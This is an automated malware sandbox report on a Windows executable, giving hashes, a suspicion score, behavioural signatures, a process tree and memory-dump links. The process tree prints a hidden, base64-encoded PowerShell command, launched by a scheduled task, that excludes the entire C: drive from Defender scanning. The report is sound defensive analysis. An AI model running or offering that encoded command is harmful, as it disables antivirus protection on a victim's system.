56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c

Analysis

max time kernel
82s
max time network
45s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
12/09/2022, 15:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe
Size

2.4MB
MD5

a0b623e5db90e7b7f91a350fcbfd661b
SHA1

12e71a986e8f65a19c7e7a99da8c049c70f533b5
SHA256

56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c
SHA512

c75234cea7a872c7314a895d17ce6ff1a20f28f76631f21ca6f4e9fc8baf39287fe1d6bc0bf0b4005ca25c4816cebb4e91146d074e24308b702e45e78c2c00ca
SSDEEP

49152:7Rozi307t/SoJvnGjQUlJrQu6Kci17kejlkH1og/61H99GoBKxCdMr0B0IaV2aLh:7RoziE7JnGkUTrQfipjlkuH1HbGVxCdI

Score

5^/10

Malware Config

Signatures

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1100	56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe
1100	56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe
1100	56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe
1100	56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe
1100	56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe
1160	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1100	56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe
Token: SeDebugPrivilege	1160	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 632 wrote to memory of 1160	632	taskeng.exe	31
PID 632 wrote to memory of 1160	632	taskeng.exe	31
PID 632 wrote to memory of 1160	632	taskeng.exe	31

C:\Users\Admin\AppData\Local\Temp\56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe
"C:\Users\Admin\AppData\Local\Temp\56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1100

C:\Windows\system32\taskeng.exe
taskeng.exe {22D7CA5E-F0EA-4A7C-BA0D-7007106BE00B} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:S4U:
1⤵
- Suspicious use of WriteProcessMemory
PID:632
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1160

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1100-54-0x00000000021F0000-0x0000000002AD8000-memory.dmp

Filesize
8.9MB

Download
memory/1100-55-0x00000000021F0000-0x0000000002AD8000-memory.dmp

Filesize
8.9MB

Download
memory/1100-56-0x0000000002AE0000-0x0000000002D15000-memory.dmp

Filesize
2.2MB

Download
memory/1100-57-0x0000000002AE0000-0x0000000002D15000-memory.dmp

Filesize
2.2MB

Download
memory/1100-58-0x00000000763F1000-0x00000000763F3000-memory.dmp

Filesize
8KB

Download
memory/1100-59-0x00000000021F0000-0x0000000002AD8000-memory.dmp

Filesize
8.9MB

Download
memory/1100-60-0x0000000002AE0000-0x0000000002D15000-memory.dmp

Filesize
2.2MB

Download
memory/1100-61-0x000000000F180000-0x000000000FA0C000-memory.dmp

Filesize
8.5MB

Download
memory/1100-62-0x000000000F180000-0x000000000FA0C000-memory.dmp

Filesize
8.5MB

Download
memory/1100-63-0x000000000EC50000-0x000000000ECDB000-memory.dmp

Filesize
556KB

Download
memory/1100-64-0x0000000002ED0000-0x0000000002F52000-memory.dmp

Filesize
520KB

Download
memory/1100-65-0x0000000005A10000-0x0000000005ABE000-memory.dmp

Filesize
696KB

Download
memory/1100-66-0x000000000EC50000-0x000000000ECDB000-memory.dmp

Filesize
556KB

Download
memory/1100-67-0x0000000002880000-0x00000000028D6000-memory.dmp

Filesize
344KB

Download
memory/1100-68-0x0000000002A80000-0x0000000002AD4000-memory.dmp

Filesize
336KB

Download
memory/1100-69-0x0000000002F50000-0x0000000002F9C000-memory.dmp

Filesize
304KB

Download
memory/1100-70-0x00000000053C0000-0x0000000005414000-memory.dmp

Filesize
336KB

Download
memory/1100-71-0x0000000002AE0000-0x0000000002D15000-memory.dmp

Filesize
2.2MB

Download
memory/1160-73-0x000007FEFC1F1000-0x000007FEFC1F3000-memory.dmp

Filesize
8KB

Download
memory/1160-74-0x000007FEF3E90000-0x000007FEF48B3000-memory.dmp

Filesize
10.1MB

Download
memory/1160-75-0x000007FEF3330000-0x000007FEF3E8D000-memory.dmp

Filesize
11.4MB

Download
memory/1160-76-0x0000000001094000-0x0000000001097000-memory.dmp

Filesize
12KB

Download
memory/1160-77-0x000000000109B000-0x00000000010BA000-memory.dmp

Filesize
124KB

Download
memory/1160-78-0x0000000001094000-0x0000000001097000-memory.dmp

Filesize
12KB

Download
memory/1160-79-0x000000000109B000-0x00000000010BA000-memory.dmp

Filesize
124KB

Download